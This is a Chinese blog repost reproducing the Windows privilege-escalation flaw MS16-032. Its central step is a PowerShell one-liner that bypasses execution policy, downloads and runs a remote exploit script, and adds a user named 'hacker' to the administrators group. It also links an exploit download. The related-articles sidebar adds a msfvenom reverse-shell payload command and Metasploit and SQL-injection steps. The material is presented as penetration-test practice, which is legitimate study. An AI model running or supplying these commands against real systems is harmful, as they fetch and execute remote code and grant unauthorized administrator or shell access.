MS16-032 漏洞复现

最新推荐文章于 2023-03-04 14:21:12 发布
最新推荐文章于 2023-03-04 14:21:12 发布
阅读量326 收藏
点赞数
原文链接:http://www.cnblogs.com/NBeveryday/p/6196611.html
版权

exploit-db的详情:  https://www.exploit-db.com/exploits/39574/

Windows: Secondary Logon Standard Handles Missing Sanitization EoP
Platform: Windows 8.1, Windows 10, not testing on Windows 7
Class: Elevation of Privilege

 

0x01使用标准用户登陆win7,下图是当前登录用户abc的详细信息。

0x02直接执行命令进行提权,简单粗暴

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators hacker /add'"

0x03下面就是见证奇迹的时刻了

 

该漏洞危害十分严重,如图在2008server上测试

本地测试如图,被安全软件检测到。

微软官方在2016年3月8日发布了补丁KB3139914。

 

附上利用提取文件下载地址https://github.com/hexx0r/CVE-2016-0051

转载于:https://www.cnblogs.com/NBeveryday/p/6196611.html

weixin_34324081
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit学习笔记(五)——Meterpreter后渗透之WMIC实战MS16-032本地溢出漏洞
Zichel77的博客
10-09 1318
比如KiTrap0D (KB979682) 、MS11-011 (KB2393802) 、MS11-080(KB2592799),然后使用没有编。因为虚拟机不怎么打补丁,所以我们可以使用很多EXP来提权,这里就用最新的MS16-032来尝试提权,对应的编号是KB3139914。可以看到目标机只打了3个补丁,要注意这些输出的结果是不能被直接利用的,使用的方式是去找提权的EXP,然后将系统已经安装的补。过程简单来说就是这几步,成功利用反弹shell后就是Meterpreter了。在WIN7中查看补丁信息。
ms17010漏洞复现-2003
aiquan9342的博客
04-29 563
先使用Smbtouch模块检测一下是否有漏洞。 然后使用Doublepulsar写一个shellcode到本地。 生成成功后的截图: 再使用EternalRomance植入Doublepulsar后门。 成功的截图: PS:仿佛是由于之前已经上传过bin的缘故,第二次测试的时候失败了。但是不影响后续操作。 都成功了以后该我们的Doublepulsar来反弹she...
利用WMIC实战MS16-032本地溢出漏洞
岁月净好
11-29 3097
假设此处我们通过了一系列的渗透测试得到了目标机器的Meterpreter Shell.   首先输入getuid命令查看已经获得的权限,可以看到现在的权限很低,是test权限。 meterpreter > getuid Server username:WIN-S7TJ4B561MT\test 尝试输入getsystem命令提权,结果失败。 meterpreter > getsystem 接着查看系统的已达补丁,传统的方法是在目标机的CMD命令行下输入systeminfo命令,或者通过查
MS17-010漏洞复现
weixin_30493401的博客
02-10 191
攻击机:192.168.148.132kali linux2018.2 x64 靶机:192.168.1.129 win7 x64 首先用msfconsole的smb模块扫描,看看是否有漏洞 use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.1.129 (目标主机) Host is likely V...
ms16-032本地溢出漏洞
最新发布
06-27
ms16-032本地溢出漏洞
057-红队测试之Windows提权小结.pdf
09-20
例如,MS16-032 漏洞是一个常见的内核漏洞,可以被攻击者利用来获得更高的访问权限。 要检测 Windows 提权,需要使用专业的工具,例如 wesng。wesng 是一个 Windows 漏洞检测工具,可以检测 Windows 操作系统中的...
三菱PLC QD77MS QD77MS16定位模块视频 编程讲解教程+使用手册+程序样例.zip
06-15
第4集 QD77ms视频教程 MS2 ms4 MS16的JOG及原点程序讲解 第5集 定位控制的几种方式 第6集 让马达按规定速度一直转动 一直正转或者反转 第7集 中途走了一节 停止了 如何重新启动 第8集 当前定位数据监控 和如何将当前...
M_D77MS16 FB库
11-23
M_D77MS16 FB库 M_D77MS16 FB库 M_D77MS16 FB库 M_D77MS16 FB库
QD77MS16 范例程序
03-17
QD77MS16 范例程序,本人上机测试过
ms16_032系统提权
a439017985的博客
02-24 1468
1.利用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 13 -b '\x00\xfff\x0a' lhost=10.10.10.128 --platform windows lport=443 -f exe >/root/test.exe 2.在msf下开启监听 use ex
【安全】靶场实战-通过MS16-032提权
03-04 961
漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)。Windows 7Windows 10目标系统需要有2个以上的CPU核心。PowerShell v2.0及更高版本必须正在运行。可根据MS16-032(KB3139914)补丁是否安装,来判断当前版本是否可利用。
MS16-032 提权 漏洞复现
Adminxe的博客
06-14 2214
exploit-db的详情:https://www.exploit-db.com/exploits/39574/ 注意点:此漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)以及为了实现利用,因为PowerShell脚本指示需要满足以下要求:目标系统需要有2个以上的CPU核心 PowerShell v2.0及更高版本必须正在运行 此漏洞会影响以下Microsoft产品: Windows Vista Windows 7 Windows 8.1 Windows 1...
利用ms16-032提权并打开3389端口
qq_45405155的博客
12-27 1328
利用ms16-032提权并打开3389端口 1、在VM中创建win 2003,在win2003上安装iis服务并开启服务 2、配置iis服务 3、上传源码及配置网站 给put文件设置权限,添加iis访问权限 设置默认访问页面 index.asp 访问192.168.x.x 4、修改checksql文件进行sql注入 判断注入点 http://192.168.8.130/shownews.asp?id=275 and 1=1 http://192.168.8.130/shownews.asp?id=2
内网渗透(二)之提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 5439
对于内网渗透,到我们拿到了公网主机的权限后,并获得了一些本机的信息时。我们首先得知道我们的权限。如果获取到的是普通用户权限,则我们需要想办法提权至管理员权限。如果获得的已经是管理员权限,则可以忽略这一步。对于Windows系统,只有提权到管理员权限后,才可以运行mimikatz以及执行一些其他高权限的操作。对于Linux系统,很多命令需要root权限才能执行,只有提权到root权限才能执行后面的信息收集等工作。
2021-09-25 内网域渗透低权限提权(五-1)
m0_51170293的博客
10-01 341
咕咕咕。。。 提权目的:低权限到高权限,从而扩大战果 手段: 本地溢出漏洞提权(未打补丁前提下) 数据库提权 第三方软件提权(向日葵,teamview~) 1本地溢出漏洞提权:用户输入的数据超过了缓存区的长度 ms16-032漏洞,这个漏洞是16年发布的,版本对象是 以普通用户的身份添加administrator以system权限运行程序 条件:目标机要有两个以上的cpu核心,并且powershell是v2.0及更高版本 Windows Vista Windows 7 Windows 8.1 Wind
powershell之ms16-032复现
qq_45300786的博客
12-14 655
因为楼主没有合适的靶机,就简单说一下环境要求。 1、存在ms16-032的靶机 2、ms16-032的ps1脚本 3、powershell默认是不能运行脚本的,请自己手动开启(百度) 4、ms16-032脚本:https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 参考文章 http://www.96sec.org/blog/post/209.html https://blo
【MS14-068漏洞复现
一纸荒芜的博客
08-26 3196
ms14-068漏洞复现
MS16-032提权正确方法
weixin_30311605的博客
03-18 1230
原版MS16-032提权会Spawn一个System Shell出来,只能通过Remote Desktop获取。这里修改exploit,直接反弹Shell。注意MS16-032依赖 thread handle,如果提了很多次后, thread handle用尽也无法成功。 root@kali:/tmp# wget https://raw.githubusercontent.com/samratas...
6.Xray工具可以发现下面哪种漏洞(2分) A.XSS B.shiro C. ms17-017 D. ms16-075
06-13
正确答案是 A。Xray 是一款功能强大的 Web 漏洞扫描工具,可以发现多种类型的漏洞,包括 XSS、SQL 注入、文件包含等。...选项 C 和 D 中的 ms17-017 和 ms16-075 是 Windows 操作系统的漏洞编号,也不是漏洞类型。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值